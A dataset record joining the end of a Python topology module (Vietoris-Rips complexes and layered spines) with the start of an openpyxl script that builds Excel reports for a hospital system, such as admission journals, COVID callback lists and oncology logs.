ny = norm(pcnp[i] - y)
nz = norm(pcnp[i] - z)
if nx < Diameter and ny < Diameter and nz < Diameter:
# Build a 3-simplex s3 with vertices i,j,k,l:
s3 = [i,j,k,l]
# s3 need not be an >oriented< 3-simplex; we first
# need to sort the vertices in ascending order:
s3.sort()
# add the oriented 3-simplex s3 to the
# Vietoris-Rips complex:
VR3S = VR3S + [s3]
auxtup = [tuple(s) for s in VR3S]
auxset = set(auxtup)
auxlist = list(auxset)
VR3S = [list(t) for t in auxlist]
return [VR0S,VR1S,VR2S,VR3S]
###############################################################################
###############################(LAYERED) SPINES################################
###############################################################################
# Auxillary function to check if a given simplex t is principal in a simpl.
# cplx. C
def isPrincipal(C,t):
k = len(t)-1
if k == ComplexDimension(C):
return True
for s in C[k+1]:
if len(SimplexIntersection(s,t)) == t:
return False
return True
# Princ will take a simpl. cplx. C and a simplex s of C.
# The output is the set of principal cofaces of s in C
def Princ(C,s):
n = ComplexDimension(C)
k = len(s)-1
if(k == n):
return []
count = 0
p = []
for t in C[k+1]:
if len(SimplexIntersection(s,t))-1 == k:
count = count+1
if count > 1:
return []
if isPrincipal(C,t):
p.append(t)
return p
# isAdmissable is an auxiliary function to check the extra condition for an
# intermediate collapse to be elementary
def isAdmissible(s,p,S):
T = ComplexIntersection(p,S)
for t in T:
for r in t:
inter = len(SimplexIntersection(r,s))
if (inter == 0 or inter == len(s)):
return False
return True
# Function to realise a Collapse. Only applied if condition for an elementary
# collapse are fulfilled.
def ElemCollapse(C,s,p):
k = len(p)-1
C[k].remove(p)
C[k-1].remove(s)
return C
# The Function Spine computes the layered spine of a given Simpl. Cplx.(Cplx)
# with resp. to S0 and C0. If one of them is empty (this has to be specified)
# the result will be a spine of Cplx in the usual sense.
def Spine(Cplx, S0 , C0):
# We create deep copies to not change the input
# Note: This doubles the required memory
K = copy.deepcopy(Cplx)
n = ComplexDimension(K)
S = copy.deepcopy(S0)
C = copy.deepcopy(C0)
IM = [[]]
for i in range(1,n+1):
# Every increment will add a list to S, C and IM to be the i-th Skeleton
S = S + [[]]
C = C + [[]]
IM = IM + [[]]
for t in K[i]:
# Here we check if all vertices of a simplex t lie in S, C, or partly
# in both (i.e. in IM)
if ComplexDimension(S) >= 0:
a = len(ComplexIntersection(t,S0)[0])
else:
a = -100
if ComplexDimension(C) >= 0:
b = len(ComplexIntersection(t,C0)[0])
else:
b = -100
if a == len(t):
S[i].append(t)
if b == len(t):
C[i].append(t)
if a != len(t) and b!=len(t):
IM[i].append(t)
#S-Collapse
stop = False
# After the execution of an ElemCollapse we have to go through the
# remaining simplices because simplices can become free after a collapse.
while not stop:
count = 0
for i in range(min(ComplexDimension(K)-1,ComplexDimension(S)-1),-1,-1):
# Creating a copy of S to iterate over
Scopy = copy.deepcopy(S)
for s in Scopy[i]:
# We search the i-th skeleton for free faces
princ_s = Princ(K,s)
# s is free if there is exactly one princ coface and none other
# princ_s either contains the unique principal coface of s
# if s is free or it is an empty list
if len(princ_s) == 1:
if princ_s[0] in S[i+1]:
K = ElemCollapse(K,s,princ_s[0])
S = ElemCollapse(S,s,princ_s[0])
count = count +1
# If no collapse has been executed we are done and break the while-loop
if count == 0:
stop = True
#C-Collapses
stop = False
while not stop:
count = 0
for i in range(min(ComplexDimension(K)-1,ComplexDimension(C)-1),-1,-1):
Ccopy = copy.deepcopy(C)
for c in Ccopy[i]:
princ_c = Princ(K,c)
if len(princ_c) == 1:
if princ_c[0] in C[i+1]:
K = ElemCollapse(K,c,princ_c[0])
C = ElemCollapse(C,c,princ_c[0])
count = count +1
if count == 0:
stop = True
#Intermediate-Collapses
stop = False
while not stop:
count = 0
for j in range(min(ComplexDimension(K)-1,ComplexDimension(IM)-1),-1,-1):
IMcopy = copy.deepcopy(IM)
for i in IMcopy[j]:
princ_i = Princ(K,i)
if len(princ_i) == 1:
# Note: we have to check an extra condition for
# intermediate collapses to be elementary
if isAdmissible(i, princ_i[0], S):
K = ElemCollapse(K,i,princ_i[0])
IM = ElemCollapse(IM,i,princ_i[0])
count = count + 1
if count == 0:
stop = True
#C-Collapses
stop = False
while not stop:
count = 0
for i in range(min(ComplexDimension(K)-1,ComplexDimension(C)-1),-1,-1):
Ccopy = copy.deepcopy(C)
for c in Ccopy[i]:
princ_c = Princ(K,c)
if len(princ_c) == 1:
if princ_c[0] in C[i+1]:
K = ElemCollapse(K,c,princ_c[0])
C = ElemCollapse(C,c,princ_c[0])
count = count +1
if count == 0:
stop = True
return K
|
en
| 0.596168
|
# Floor functions is used for certain perversity functions # Delaunay triangulation used to generate Delaunay-Vietoris-Rips complexes ############################################################################### ###########################Z/2Z SMITH NORMAL FORM############################## ############################################################################### ############################################################################### ########################SIMPLICIAL OPERATIONS################################## ############################################################################### #Computing the dimension of a simpl. cplx. # SimplexIntersections returns the "largest" face of given simpl. s and t # function tests whether a simplex is contained in a simpl. cplx or not # ComplexIntersection returns a list of simplices (not a complex but in a # similar format) of the simplices in the simpl. cplx. K that are faces of the # simplex s. The special format of the output allows us to apply the function # ComplexDimension to it. ############################################################################### ##########################INTERSECTION CHAIN COMPLEX########################### ############################################################################### # Some common perversity functions # isProper decides whether or not a given simplex s is proper in the sense of # corresponding to a simplicial chain that is transverse +- perversity # Note: we allow a simplex to be proper even if it's boundary is not. The # output is later on used to determine intersection chains. # IS takes a simpl. cplx. C with specified stratification strata and a # perversity p. It returns the simplices in C that are proper (in the above # sense) and the ones that are not proper in two separate lists. # In the following we define some functions to perform a matrix reduction # algorithm. This will be used to identify all simplicial intersection # chains, also the non elementary ones. # The input for the function MatrixReduction is a matrix M and an integer k. # This routine executes elementary column transformations from left to right # in order to eliminate nonzero entries below the row index k. # The output includes the matrix M in reduced form and a lists columns whose # entries below index k are all zero. This process works in Z/2Z only. # The function IC accepts a simpl. cplx. C, a stratification strata # and a perversity p. The output includes the perversity p Intersection # Chain Complex associated with the initial complex C. The filtration is # specified by strata. Furthermore, IC also returns the Betti numbers of # perversity p intersection homology. # list for the resulting Intersection Chain Complex # Note: If there are no improper simplices in this dimension there is # nothing to do # Setting up the binary incidence matrix following the order in aC. # We determine the intersection chain complex with redM[1]. # The list redM[1] contains indices corresponding to the proper # i-simplices that make as sum an allowable simpl. chain # Next, we calculate the Betti numbers via the rank of a reduced matrix # Auxiliary function to check whether or not a given simpl. cplx. represents a # pseudomanifold ############################################################################### ###################SIMPLICIAL COMPLEXES FROM POINT CLOUDS###################### ############################################################################### # DelVR complex, compare do DelCech complex as in Bauer & Edelsbrunner 2017. # Currently restricted to point clouds xyz of dimension <= 3. # We employed the function Delaunay from the scipy.spatial package to realize # Delaunay triangulations. # First we construct Delaunay triangulation and then select simplices # whose vertices lie pairwise closer than distance r to each other. # DelE may contain duplicate simplices. So we need to remove these # duplicates: # The function VRComplex calculates the Vietoris-Rips complex of a # point cloud xyz for the radius r. Currently the complex is restricted # to dimension 3. # Build a 2-simplex s2 with vertices i,j,k: # s2 need not be an >oriented< 2-simplex; we first # need to sort the vertices in ascending order: # add the oriented 2-simplex s2 to the # Vietoris-Rips complex: # VR2S may contain duplicate simplices. So we need to remove these # duplicates: # We compute the 3-simplices of the Vietoris-Rips complex. # This operation is quadratic in the number of data points/2-simplices. # s2 ranges over all 2-simplices: # Build a 3-simplex s3 with vertices i,j,k,l: # s3 need not be an >oriented< 3-simplex; we first # need to sort the vertices in ascending order: # add the oriented 3-simplex s3 to the # Vietoris-Rips complex: ############################################################################### ###############################(LAYERED) SPINES################################ ############################################################################### # Auxillary function to check if a given simplex t is principal in a simpl. # cplx. C # Princ will take a simpl. cplx. C and a simplex s of C. # The output is the set of principal cofaces of s in C # isAdmissable is an auxiliary function to check the extra condition for an # intermediate collapse to be elementary # Function to realise a Collapse. Only applied if condition for an elementary # collapse are fulfilled. # The Function Spine computes the layered spine of a given Simpl. Cplx.(Cplx) # with resp. to S0 and C0. If one of them is empty (this has to be specified) # the result will be a spine of Cplx in the usual sense. # We create deep copies to not change the input # Note: This doubles the required memory # Every increment will add a list to S, C and IM to be the i-th Skeleton # Here we check if all vertices of a simplex t lie in S, C, or partly # in both (i.e. in IM) #S-Collapse # After the execution of an ElemCollapse we have to go through the # remaining simplices because simplices can become free after a collapse. # Creating a copy of S to iterate over # We search the i-th skeleton for free faces # s is free if there is exactly one princ coface and none other # princ_s either contains the unique principal coface of s # if s is free or it is an empty list # If no collapse has been executed we are done and break the while-loop #C-Collapses #Intermediate-Collapses # Note: we have to check an extra condition for # intermediate collapses to be elementary #C-Collapses
| 3.102221
| 3
|
statistic/structure_sheet.py
|
VoprosiKira/l2
| 0
|
6628078
|
<gh_stars>0
import json
from collections import OrderedDict
import openpyxl
from openpyxl.styles import Border, Side, Alignment, Font, NamedStyle
from openpyxl.utils.cell import get_column_letter
from directions.models import IstochnikiFinansirovaniya
from doctor_call.models import DoctorCall
from hospitals.tfoms_hospital import HOSPITAL_TITLE_BY_CODE_TFOMS
from utils.dates import normalize_dash_date
from dateutil.parser import parse as du_parse
from dateutil.relativedelta import relativedelta
month_dict = {1: 'Январь', 2: 'Февраль', 3: 'Март', 4: 'Апрель', 5: 'Май', 6: 'Июнь', 7: 'Июль', 8: 'Август', 9: 'Сентябрь', 10: 'Октябрь', 11: 'Ноябрь', 12: 'Декабрь'}
def job_total_base(ws1, month, type_fin):
"""
Основа(каркас) для итоговых данных
:return:
"""
ws1.column_dimensions[get_column_letter(1)].width = 22
for i in range(1, 32):
ws1.column_dimensions[get_column_letter(1 + i)].width = 4
ws1.cell(row=4, column=1 + i).value = str(i)
ws1.cell(row=1, column=1).value = 'Месяц'
ws1.cell(row=1, column=2).value = month_dict.get(month)
ws1.cell(row=4, column=1).value = 'Вид работы'
fin_obj = IstochnikiFinansirovaniya.objects.get(pk=type_fin)
ws1.cell(row=2, column=1).value = fin_obj.title
return ws1
def jot_total_titles(ws1, titles):
"""
Заговловки видов работ
:param ws1:
:param titles:
:return:
"""
cel_res = OrderedDict()
for i in range(len(titles)):
cell_row = 5 + i
ws1.cell(row=cell_row, column=1).value = titles[i]
cel_res[titles[i]] = cell_row
return ws1, cel_res
def job_total_data(ws1, titles, data):
for k, v in data.items():
for res, uet in v.items():
r = titles.get(res)
ws1.cell(row=r, column=k + 1).value = str(uet)
def passed_research_base(ws1, data_date):
"""
:param ws1:
:return:
"""
style_border = NamedStyle(name="style_border")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
ws1.merge_cells(start_row=1, start_column=1, end_row=1, end_column=19)
ws1.cell(row=1, column=1).value = 'ЖУРНАЛ учета приема и отказов в госпитализации за ' + data_date + 'г.(мед.документация Ф№001/У утв. МИНЗДРАВОМ СССР 04.10.1980г. №1030)'
ws1.cell(row=1, column=1).style = style_border
# габариты ячеек
ws1.row_dimensions[2].height = 115
columns = [
('№ п/п', 5),
('Время поступления', 8),
('Услуга (дата-время подтверждения)', 14),
('Направление', 11),
('Фамилия, имя, отчество больного', 20),
('Дата рождения', 10),
('Постоянное место жительства или адрес родственников, близких и N телефона', 23),
('Каким учреждением был направлен или доставлен', 15),
('Отделение, в которое помещен больной', 12),
('N карты (стационарного) больного', 10),
('Диагноз направившего учреждения', 7),
('Диагноз при поступлении', 7),
('№ ДДУ', 16),
('Полис', 21),
('Примечания', 10),
('Выписан, переведен в другой стационар, умер (вписать и указать дату и название стационара, куда переведен', 20),
('Отметка о сообщении родственникам или учреждению', 11),
('Если не был госпитализирован указать причину и принятые меры', 11),
('отказ в приеме первичный, повторный (вписать)', 11),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=2, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=2, column=idx).style = style_border
return ws1
def passed_research_data(ws1, data):
r = 2
n = 0
empty = ' '
style_border1 = NamedStyle(name="style_border1")
bd = Side(style='thin', color="000000")
style_border1.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border1.font = Font(bold=False, size=11)
style_border1.alignment = Alignment(wrap_text=True, horizontal='left', vertical='center')
for i in data:
current_research_title = i[1]
current_polis_n = i[2] or empty
current_polis_who_give = i[3] or empty
current_napravlen = i[4]
current_datatime_confirm = i[5]
current_create_napr = i[6]
current_diagnoz = i[7] or empty
current_result = i[8] or empty
current_napr_time_at = i[19] or empty
current_num_card = i[10]
current_family = i[11] or empty
current_name = i[12] or empty
current_patronymic = i[13] or empty
current_birthday = i[14] or empty
current_main_address = i[15] if i[15] else ''
current_fact_address = i[16] if i[16] else empty
current_address = current_main_address if current_main_address else current_fact_address
current_work_place = i[17] or empty
current_kem_napravlen = i[18] or empty
r = r + 1
n = n + 1
ws1.cell(row=r, column=1).value = n
ws1.cell(row=r, column=2).value = current_napr_time_at
ws1.cell(row=r, column=3).value = f'{current_research_title},\n({current_datatime_confirm})'
ws1.cell(row=r, column=4).value = f'{current_napravlen},\n({current_create_napr})'
ws1.cell(row=r, column=5).value = current_family + ' ' + current_name + ' ' + current_patronymic
ws1.cell(row=r, column=6).value = current_birthday
ws1.cell(row=r, column=7).value = current_address
ws1.cell(row=r, column=8).value = current_kem_napravlen
ws1.cell(row=r, column=9).value = 'Приемное'
ws1.cell(row=r, column=10).value = current_num_card
ws1.cell(row=r, column=11).value = ' '
ws1.cell(row=r, column=12).value = current_diagnoz
ws1.cell(row=r, column=13).value = current_work_place
ws1.cell(row=r, column=14).value = current_polis_n + ', ' + current_polis_who_give
ws1.cell(row=r, column=15).value = ' '
ws1.cell(row=r, column=16).value = current_result
ws1.cell(row=r, column=17).value = ' '
ws1.cell(row=r, column=18).value = ' '
ws1.cell(row=r, column=19).value = ' '
for j in range(1, 20):
ws1.cell(row=r, column=j).style = style_border1
return ws1
def covid_call_patient_base(ws1):
"""
:param ws1:
:return:
"""
style_border = NamedStyle(name="style_border")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
ws1.merge_cells(start_row=1, start_column=1, end_row=1, end_column=19)
ws1.cell(row=1, column=1).value = 'Обзвон'
ws1.cell(row=1, column=1).style = style_border
# габариты ячеек
ws1.row_dimensions[2].height = 15
columns = [
('ФИО', 25),
('№ карты', 15),
('Телефон', 20),
('Оператор', 25),
('Дата', 25),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=2, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=2, column=idx).style = style_border
return ws1
def covid_call_patient_data(ws1, data):
r = 3
style_border1 = NamedStyle(name="style_border1")
bd = Side(style='thin', color="000000")
style_border1.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border1.font = Font(bold=False, size=11)
style_border1.alignment = Alignment(wrap_text=True, horizontal='left', vertical='center')
for i in data:
ws1.cell(row=r, column=1).value = i["fio_patient"]
ws1.cell(row=r, column=2).value = i["number"]
ws1.cell(row=r, column=3).value = i["Контактный телефон"]
ws1.cell(row=r, column=4).value = i["Оператор"]
ws1.cell(row=r, column=5).value = normalize_dash_date(i["Дата следующего звонка"])
for j in range(1, 6):
ws1.cell(row=r, column=j).style = style_border1
return ws1
def covid_swab_base(ws1):
"""
:param ws1:
:return:
"""
style_border = NamedStyle(name="style_border")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
ws1.merge_cells(start_row=1, start_column=1, end_row=1, end_column=19)
ws1.cell(row=1, column=1).value = 'Повторный мазок'
ws1.cell(row=1, column=1).style = style_border
# габариты ячеек
ws1.row_dimensions[2].height = 15
columns = [
('ФИО', 25),
('№ карты', 15),
('Телефон', 20),
('Оператор', 25),
('Дата', 25),
('Адрес', 55),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=2, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=2, column=idx).style = style_border
return ws1
def covid_swab_data(ws1, data):
r = 3
style_border1 = NamedStyle(name="style_border1")
bd = Side(style='thin', color="000000")
style_border1.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border1.font = Font(bold=False, size=11)
style_border1.alignment = Alignment(wrap_text=True, horizontal='left', vertical='center')
for i in data:
ws1.cell(row=r, column=1).value = i["fio_patient"]
ws1.cell(row=r, column=2).value = i["number"]
ws1.cell(row=r, column=3).value = i["Контактный телефон"]
ws1.cell(row=r, column=4).value = i["Оператор"]
ws1.cell(row=r, column=5).value = normalize_dash_date(i["Сдача повторного мазка на COVID"])
ws1.cell(row=r, column=6).value = i["Адрес"]
for j in range(1, 6):
ws1.cell(row=r, column=j).style = style_border1
r += 1
return ws1
def covid_bl_base(ws1):
"""
:param ws1:
:return:
"""
style_border = NamedStyle(name="style_border")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
ws1.merge_cells(start_row=1, start_column=1, end_row=1, end_column=19)
ws1.cell(row=1, column=1).value = 'Продолжение БЛ'
ws1.cell(row=1, column=1).style = style_border
# габариты ячеек
ws1.row_dimensions[2].height = 15
columns = [
('ФИО', 25),
('№ карты', 15),
('Телефон', 20),
('Оператор', 25),
('Дата', 25),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=2, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=2, column=idx).style = style_border
return ws1
def covid_bl_data(ws1, data):
r = 3
style_border1 = NamedStyle(name="style_border1")
bd = Side(style='thin', color="000000")
style_border1.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border1.font = Font(bold=False, size=11)
style_border1.alignment = Alignment(wrap_text=True, horizontal='left', vertical='center')
for i in data:
ws1.cell(row=r, column=1).value = i["fio_patient"]
ws1.cell(row=r, column=2).value = i["number"]
ws1.cell(row=r, column=3).value = i["Контактный телефон"]
ws1.cell(row=r, column=4).value = i["Оператор"]
ws1.cell(row=r, column=5).value = normalize_dash_date(i["Продолжение БЛ"])
for j in range(1, 6):
ws1.cell(row=r, column=j).style = style_border1
return ws1
def onco_base(ws1, d_s, d_e):
"""
:param ws1:
:return:
"""
style_border = NamedStyle(name="style_border")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=13)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
ws1.merge_cells(start_row=1, start_column=1, end_row=1, end_column=8)
ws1.cell(row=1, column=1).value = f'ЖУРНАЛ учета онкоподозрения c {d_s} по {d_e}'
ws1.cell(row=1, column=1).style = style_border
# габариты ячеек
# ws1.row_dimensions[2].height = 85
columns = [('№ п/п', 5), ('ФИО пациента', 30), ('Дата рождения', 15), ('N карты', 15), ('Врач поставил', 30), ('Дата постановки', 20), ('Врач снял', 30), ('Дата снятия', 20)]
ws1.row_dimensions[2].height = 15
ws1.cell(row=2, column=1).value = ''
for idx, column in enumerate(columns, 1):
ws1.cell(row=3, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=3, column=idx).style = style_border
return ws1
def passed_onco_data(ws1, data):
r = 3
n = 0
empty = ' '
style_border1 = NamedStyle(name="style_border1")
bd = Side(style='thin', color="000000")
style_border1.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border1.font = Font(bold=False, size=12)
style_border1.alignment = Alignment(wrap_text=True, horizontal='left', vertical='center')
for i in data:
current_patient = i[0] or empty
current_birhday = i[1] or empty
current_num_card = i[2] or empty
current_doc_start = i[3] or empty
current_date_start = i[4] or empty
current_doc_end = i[5] or empty
current_date_end = i[6] or empty
r = r + 1
n = n + 1
ws1.cell(row=r, column=1).value = n
ws1.cell(row=r, column=2).value = current_patient
ws1.cell(row=r, column=3).value = current_birhday
ws1.cell(row=r, column=4).value = current_num_card
ws1.cell(row=r, column=5).value = current_doc_start
ws1.cell(row=r, column=6).value = current_date_start
ws1.cell(row=r, column=7).value = current_doc_end
ws1.cell(row=r, column=8).value = current_date_end
for j in range(1, 9):
ws1.cell(row=r, column=j).style = style_border1
return ws1
def style_sheet():
style_border = NamedStyle(name="style_border")
bd = Side(style='thin', color="000000")
border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.border = border
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True)
style_border1 = NamedStyle(name="style_border1")
style_border1.border = border
style_border1.font = Font(bold=False, size=11)
style_border1.alignment = Alignment(wrap_text=True)
style_o = NamedStyle(name="style_o")
style_o.font = Font(bold=True, size=11)
style_border_res = NamedStyle(name="style_border_res")
bd = Side(style='thin', color="000000")
style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border_res.font = Font(bold=False, size=11)
style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
return (style_border, style_o, style_border1, style_border_res)
def statistics_tickets_base(ws1, i_obj, type_fin, d1, d2, style_border, style_o):
"""
Назначить ширину колонок. Вход worksheet выход worksheen с размерами
Заголовки данных
"""
columns = [
('Дата', 13),
('Кол-во', 7),
('Услуга', 15),
('Соисполнитель', 9),
('ФИО пациента,\n№ направления', 31),
('Дата рождения', 13),
('№ карты', 12),
('Данные полиса', 27),
('Код услуги', 16),
('Услуга \n (ует/мин)', 12),
('Время \n подтверждения', 18),
('Онкоподозрение', 13),
('Первичный прием', 12),
('Цель \n посещения\n(код)е', 13),
('Диагноз \n МКБ', 13),
('Впервые', 13),
('Результат \n обращения \n(код)', 13),
('Исход(код)', 13),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=7, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=7, column=idx).style = style_border
# Закголовки столбцов
ws1.cell(row=1, column=1).value = 'Сотрудник'
ws1.cell(row=1, column=1).style = style_o
ws1.cell(row=1, column=2).value = i_obj.fio
ws1.cell(row=2, column=1).value = 'Должность'
ws1.cell(row=2, column=1).style = style_o
ws1.cell(row=2, column=2).value = i_obj.specialities.title if i_obj.specialities else ""
ws1.cell(row=4, column=1).value = 'Период:'
ws1.cell(row=4, column=1).style = style_o
ws1.cell(row=5, column=1).value = d1
ws1.cell(row=5, column=2).value = 'по'
ws1.cell(row=5, column=3).value = d2
ws1.cell(row=1, column=5).value = 'Код врача'
ws1.cell(row=1, column=5).style = style_o
ws1.cell(row=1, column=6).value = i_obj.personal_code
ws1.cell(row=3, column=5).value = 'Источник'
ws1.cell(row=3, column=5).style = style_o
fin_obj = IstochnikiFinansirovaniya.objects.get(pk=type_fin)
ws1.cell(row=3, column=6).value = fin_obj.title
return ws1
def statistics_tickets_data(ws1, issl_obj, i_obj, style_border1):
# i_obj - обеъект доктор
my_fill = openpyxl.styles.fills.PatternFill(patternType='solid', start_color='a9d094', end_color='a9d094')
total_fill = openpyxl.styles.fills.PatternFill(patternType='solid', start_color='ffcc66', end_color='ffcc66')
r = 7
r1 = r + 1
total_sum = []
# one_days = timedelta(1)
current_date = ''
for issled in issl_obj:
# Порядок колонок в issled:
# title, code, is_first_reception, polis_n, polis_who_give, \
# first_time, napravleniye_id, doc_confirmation_id, def_uet, co_executor_id, \
# co_executor_uet, co_executor2_id, co_executor2_uet, datetime_confirm, date_confirm, \
# time_confirm, maybe_onco, purpose, diagnos, iss_result, \
# outcome, card_number, client_family, client_name, client_patronymic, \
# birthday
empty = ' '
# current_datetime_confirm = issled[13]
current_date = issled[14]
# current_count = 1
current_research_title = issled[0]
f = issled[22] or empty
n = issled[23] or empty
p = issled[24] or empty
current_napr = str(issled[6])
current_patient_napr = f'{f} {n} {p}\n{current_napr}'
current_born = issled[25]
current_card = issled[21]
polis_n = issled[3] or ''
polis_who = issled[4] or ''
current_polis = f'{polis_n};\n{polis_who}'
current_code_reserch = issled[1]
current_doc_conf = issled[7]
current_def_uet = issled[8] or 0
current_co_exec1 = issled[9]
current_uet1 = issled[10] or 0
current_co_exec2 = issled[11]
current_uet2 = issled[12] or 0
current_time_confirm = issled[15]
current_isfirst = issled[2]
current_onko = issled[16]
current_purpose = issled[17]
current_diagnos = issled[18]
current_firsttime = issled[5]
current_result = issled[19]
current_octome = issled[20]
# current_price = ''
if r != 7 and r != 8:
befor_date = ws1.cell(row=r, column=1).value
if current_date != befor_date and not (ws1.cell(row=r, column=1).value).istitle():
r = r + 1
ws1.cell(row=r, column=1).value = 'Итого за ' + befor_date[:2]
ws1.cell(row=r, column=2).value = f'=SUM(B{r1}:B{r - 1})'
ws1.cell(row=r, column=10).value = f'=SUM(J{r1}:J{r - 1})'
total_sum.append(r)
ws1.row_dimensions.group(r1, r - 1, hidden=True)
rows = ws1[f'A{r}:V{r}']
for row in rows:
for cell in row:
cell.fill = my_fill
r1 = r + 1
r = r + 1
ws1.cell(row=r, column=1).value = current_date
ws1.cell(row=r, column=2).value = 1
ws1.cell(row=r, column=3).value = current_research_title
sum_uet = 0
co_exec = ''
if (current_doc_conf == i_obj.pk) and (current_co_exec1 == i_obj.pk):
sum_uet = sum_uet + current_def_uet
co_exec = co_exec + 'ОСН'
if (current_doc_conf == i_obj.pk) and (current_co_exec1 != i_obj.pk):
sum_uet = sum_uet + current_def_uet
co_exec = co_exec + 'ОСН'
if (current_doc_conf != i_obj.pk) and (current_co_exec1 == i_obj.pk):
sum_uet = sum_uet + current_uet1
co_exec = co_exec + 'СО-1'
if current_co_exec2 == i_obj.pk:
sum_uet = sum_uet + current_uet2
co_exec = co_exec + ', СО-2'
ws1.cell(row=r, column=4).value = co_exec
ws1.cell(row=r, column=5).value = current_patient_napr
ws1.cell(row=r, column=6).value = current_born
ws1.cell(row=r, column=7).value = current_card
ws1.cell(row=r, column=8).value = current_polis
ws1.cell(row=r, column=9).value = current_code_reserch
ws1.cell(row=r, column=10).value = str(sum_uet)
ws1.cell(row=r, column=11).value = current_time_confirm
ws1.cell(row=r, column=12).value = current_onko
ws1.cell(row=r, column=13).value = current_isfirst
ws1.cell(row=r, column=14).value = current_purpose
ws1.cell(row=r, column=15).value = current_diagnos
ws1.cell(row=r, column=16).value = current_firsttime
ws1.cell(row=r, column=17).value = current_result
ws1.cell(row=r, column=18).value = current_octome
ws1.cell(row=r, column=19).value = ''
rows = ws1[f'A{r}:V{r}']
for row in rows:
for cell in row:
cell.style = style_border1
r = r + 1
ws1.cell(row=r, column=1).value = 'Итого за ' + current_date[:2]
ws1.cell(row=r, column=2).value = f'=SUM(B{r1}:B{r - 1})'
ws1.cell(row=r, column=10).value = f'=SUM(J{r1}:J{r - 1})'
ws1.row_dimensions.group(r1, r - 1, hidden=True)
total_sum.append(r)
rows = ws1[f'A{r}:V{r}']
for row in rows:
for cell in row:
cell.fill = my_fill
t_s = '=SUM('
t_s_uet = '=SUM('
for ts in total_sum:
t_uet = ts
t_s = t_s + f'(B{ts})' + ','
t_s_uet = t_s_uet + f'(J{t_uet})' + ','
t_s = t_s + ')'
t_s_uet = t_s_uet + ')'
r = r + 1
ws1.cell(row=r, column=1).value = 'Итого Всего'
ws1.cell(row=r, column=2).value = t_s
ws1.cell(row=r, column=10).value = t_s_uet
rows = ws1[f'A{r}:V{r}']
for row in rows:
for cell in row:
cell.fill = total_fill
return ws1
def inderect_job_base(ws1, doc_obj, d1, d2):
pink_fill = openpyxl.styles.fills.PatternFill(patternType='solid', start_color='FCD5B4', end_color='FCD5B4')
rows = ws1[f'A{1}:V{1}']
for row in rows:
for cell in row:
cell.fill = pink_fill
ws1.column_dimensions[get_column_letter(1)].width = 15
ws1.column_dimensions[get_column_letter(2)].width = 30
ws1.column_dimensions[get_column_letter(3)].width = 15
ws1.cell(row=1, column=1).value = "Косвенные услуги"
ws1.cell(row=2, column=1).value = "Сотрудник"
ws1.cell(row=2, column=2).value = doc_obj.fio
ws1.cell(row=3, column=1).value = f'c {d1}'
ws1.cell(row=3, column=2).value = f'по {d2}'
return ws1
def inderect_job_data(ws1, indirect_job):
r = 4
for k, v in indirect_job.items():
for k_job, v_job in v.items():
r = r + 1
ws1.cell(row=r, column=1).value = k
ws1.cell(row=r, column=2).value = k_job
ws1.cell(row=r, column=3).value = v_job
return ws1
def statistic_research_base(ws1, d1, d2, research_titile):
style_border = NamedStyle(name="style_border")
bd = Side(style='thin', color="000000")
style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
style_border.font = Font(bold=True, size=11)
style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
ws1.cell(row=1, column=1).value = 'Услуга:'
ws1.cell(row=1, column=2).value = research_titile
ws1.cell(row=2, column=1).value = 'Период:'
ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
columns = [
('Исполнитель', 26),
('Направление, за дату', 15),
('Дата подтверждения', 16.5),
('Время подтверждения', 16.5),
('Источник', 10),
('Цена', 10),
('Кол-во', 7),
('Скидка', 7.5),
('Сумма', 14),
('Физлицо', 26),
('Дата рождения', 12),
('Возраст', 8),
('Карта', 15),
]
for idx, column in enumerate(columns, 1):
ws1.cell(row=4, column=idx).value = column[0]
ws1.column_dimensions[get_column_letter(idx)].width = column[1]
ws1.cell(row=4, column=idx).style = style_border
return ws1
def statistic_research_data(ws1, researches):
"""
res - результат выборки SQL
порядок возврата:
napr, date_confirm, time_confirm, create_date_napr, create_time_napr,
doc_fio, coast, discount, how_many, ((coast + (coast/100 * discount)) * how_many)::NUMERIC(10,2) AS sum_money,
ist_f, time_confirmation, num_card, ind_family, ind_name,
